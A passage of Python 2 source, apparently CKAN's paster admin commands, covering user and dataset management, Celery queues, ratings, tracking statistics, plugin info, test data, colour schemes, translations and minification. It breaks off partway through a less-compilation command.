usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print 'Users:'
users = model.Session.query(model.User).filter_by(state = 'active')
print 'count = %i' % users.count()
for user in users:
print self.get_user_str(user)
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(unicode(username))
print 'User: \n', user
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print 'Done'
def search(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need user name query string.'
return
query_str = self.args[1]
query = model.User.search(query_str)
print '%i users matching %r:' % (query.count(), query_str)
for user in query.all():
print self.get_user_str(user)
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
print 'Passwords do not match'
sys.exit(1)
return password1
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
sys.exit(1)
username = self.args[1]
# parse args into data_dict
data_dict = {'name': username}
for arg in self.args[2:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError('Could not parse arg: %r (expected "<option>=<value>)"' % arg)
if 'password' not in data_dict:
data_dict['password'] = self.password_prompt()
print('Creating user: %r' % username)
try:
import ckan.logic as logic
site_user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError, e:
print e
sys.exit(1)
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.delete()
model.repo.commit_and_remove()
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
print self.usage
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print 'Datasets:'
datasets = model.Session.query(model.Package)
print 'count = %i' % datasets.count()
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' \
else ''
print '%s %s %s' % (dataset.id, dataset.name, state)
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(unicode(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print '%s %s -> %s' % (dataset.name, old_state, dataset.state)
def purge(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
name = dataset.name
rev = model.repo.new_revision()
dataset.purge()
model.repo.commit_and_remove()
print '%s purged' % name
class Celery(CkanCommand):
'''Celery daemon
Usage:
celeryd <run> - run the celery daemon
celeryd run concurrency - run the celery daemon with
argument 'concurrency'
celeryd view - view all tasks in the queue
celeryd clean - delete all tasks in the queue
'''
min_args = 0
max_args = 2
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
if not self.args:
self.run_()
else:
cmd = self.args[0]
if cmd == 'run':
self.run_()
elif cmd == 'view':
self.view()
elif cmd == 'clean':
self.clean()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def run_(self):
os.environ['CKAN_CONFIG'] = os.path.abspath(self.options.config)
from ckan.lib.celery_app import celery
celery_args = []
if len(self.args) == 2 and self.args[1] == 'concurrency':
celery_args.append['--concurrency=1']
celery.worker_main(argv=['celeryd', '--loglevel=INFO'] + celery_args)
def view(self):
self._load_config()
import ckan.model as model
from kombu.transport.sqlalchemy.models import Message
q = model.Session.query(Message)
q_visible = q.filter_by(visible=True)
print '%i messages (total)' % q.count()
print '%i visible messages' % q_visible.count()
for message in q:
if message.visible:
print '%i: Visible' % (message.id)
else:
print '%i: Invisible Sent:%s' % (message.id, message.sent_at)
def clean(self):
self._load_config()
import ckan.model as model
query = model.Session.execute("select * from kombu_message")
tasks_initially = query.rowcount
if not tasks_initially:
print 'No tasks to delete'
sys.exit(0)
query = model.Session.execute("delete from kombu_message")
query = model.Session.execute("select * from kombu_message")
tasks_afterwards = query.rowcount
print '%i of %i tasks deleted' % (tasks_initially - tasks_afterwards,
tasks_initially)
if tasks_afterwards:
print 'ERROR: Failed to delete all tasks'
sys.exit(1)
model.repo.commit_and_remove()
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print 'Command %s not recognized' % cmd
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
if not user_ratings:
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
print self.__class__.__doc__
sys.exit(1)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
print self.__class__.__doc__
sys.exit(1)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
# No date given. See when we last have data for and get data
# from 2 days before then in case new data is available.
# If no date here then use 2011-01-01 as the start date
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
start_date_solrsync = start_date
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print 'tracking updated for %s' % start_date
start_date = stop_date
self.update_tracking_solr(engine, start_date_solrsync)
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(
sql, measure_from=str(measure_from)
).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '/dataset/'
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)='%s';
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;''' % summary_date
engine.execute(sql)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE p.name = regexp_replace(' ' || t.url, '^[ ]{1}(/\w{2}){0,1}' || %s, ''))
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
def update_tracking_solr(self, engine, start_date):
sql = '''SELECT package_id FROM tracking_summary
where package_id!='~~not~found~~'
and tracking_date >= %s;'''
results = engine.execute(sql, start_date)
package_ids = set()
for row in results:
package_ids.add(row['package_id'])
total = len(package_ids)
not_found = 0
print '%i package index%s to be rebuilt starting from %s' % (total, '' if total < 2 else 'es', start_date)
from ckan.lib.search import rebuild
for package_id in package_ids:
try:
rebuild(package_id)
except logic.NotFound:
print "Error: package %s not found." % (package_id)
not_found += 1
except KeyboardInterrupt:
print "Stopped."
return
except:
raise
print 'search index rebuilding done.' + (' %i not found.' % (not_found) if not_found else "")
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class' : item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc' : plugin.__doc__,
'class' : plugin,
'implements' : []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print plugin + ':'
print '-' * (len(plugin) + 1)
if p['doc']:
print p['doc']
print 'Implements:'
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print ' %s' % i
if extra:
print extra
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# is this a classmethod if so remove the first parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
create-test-data vocabs - annakerenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
self._setup_app()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print 'Creating %s test data' % cmd
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print 'Created user %r with password %r and apikey %r' % ('tester',
'tester', 'tester')
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print 'Command %s not recognized' % cmd
raise NotImplementedError
if self.verbose:
print 'Creating %s test data: Complete!' % cmd
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by runsnakerun.
Usage:
profile URL
e.g. profile /data/search
The result is saved in profile.data.search
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
You may need to install python module: cProfile
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
def profile_url(url):
try:
res = self.app.get(url, status=[200], extra_environ={'REMOTE_USER': 'visitor'})
except paste.fixture.AppError:
print 'App error: ', url.strip()
except KeyboardInterrupt:
raise
except:
import traceback
traceback.print_exc()
print 'Unknown error: ', url.strip()
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
print 'Written profile to: %s' % output_filename
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
color <'HEX'> - uses as base color eg '#ff00ff' must be quoted.
color <VALUE> - a float between 0.0 and 1.0 used as base hue
color <COLOR_NAME> - html color name used for base color eg lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
'aliceblue': '#f0fff8',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
'indianred ': '#cd5c5c',
'indigo ': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370d8',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#d87093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
import math
saturation -= math.trunc(saturation)
print hue, saturation
import colorsys
''' Create n related colours '''
colors=[]
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color='#FFFFFF'
colors.append(hex_color)
return colors
def command(self):
hue = None
saturation = None
lightness = None
path = os.path.dirname(__file__)
path = os.path.join(path, '..', 'public', 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print 'custom colors removed.'
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print 'ERROR: invalid color'
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print 'ERROR argument `%s` not recognised' % arg
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print '%s: %s;\n' % (self.rules[i], colors[i])
f.close
print 'Color scheme has been created.'
print 'Make sure less is run for changes to take effect.'
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from pylons import config
self.ckan_path = os.path.join(os.path.dirname(__file__), '..')
i18n_path = os.path.join(self.ckan_path, 'i18n')
self.i18n_path = config.get('ckan.i18n_directory', i18n_path)
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
self.build_js_translations()
else:
print 'command not recognised'
def po2dict(self, po, lang):
'''Convert po object to dictionary data structure (ready for JSON).
This function is from pojson
https://bitbucket.org/obviel/pojson
Copyright (c) 2010, Fanstatic Developers
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the <organization> nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL FANSTATIC DEVELOPERS BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
result = {}
result[''] = {}
result['']['plural-forms'] = po.metadata['Plural-Forms']
result['']['lang'] = lang
result['']['domain'] = 'ckan'
for entry in po:
if entry.obsolete:
continue
# check if used in js file we only include these
occurrences = entry.occurrences
js_use = False
for occurrence in occurrences:
if occurrence[0].endswith('.js'):
js_use = True
continue
if not js_use:
continue
if entry.msgstr:
result[entry.msgid] = [None, entry.msgstr]
elif entry.msgstr_plural:
plural = [entry.msgid_plural]
result[entry.msgid] = plural
ordered_plural = sorted(entry.msgstr_plural.items())
for order, msgstr in ordered_plural:
plural.append(msgstr)
return result
def build_js_translations(self):
import polib
import simplejson as json
def create_js(source, lang):
print 'Generating', lang
po = polib.pofile(source)
data = self.po2dict(po, lang)
data = json.dumps(data, sort_keys=True,
ensure_ascii=False, indent=2 * ' ')
out_dir = os.path.abspath(os.path.join(self.ckan_path, 'public',
'base', 'i18n'))
out_file = open(os.path.join(out_dir, '%s.js' % lang), 'w')
out_file.write(data.encode('utf-8'))
out_file.close()
for l in os.listdir(self.i18n_path):
if os.path.isdir(os.path.join(self.i18n_path, l)):
f = os.path.join(self.i18n_path, l, 'LC_MESSAGES', 'ckan.po')
create_js(f, l)
print 'Completed generating JavaScript translations'
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
NOTE: This will destroy the current translations fot zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print 'zh_TW has been mangled'
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
if the --clean option is provided any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False, help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
dirs[:] = [d for d in dirs if not d in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
# Path is neither a file or a dir?
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print 'removing %s' % path
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
minifed.
:param path: The path to the .js or .css file to minify
'''
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print "Minified file '{0}'".format(path)
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self.less()
custom_css = {
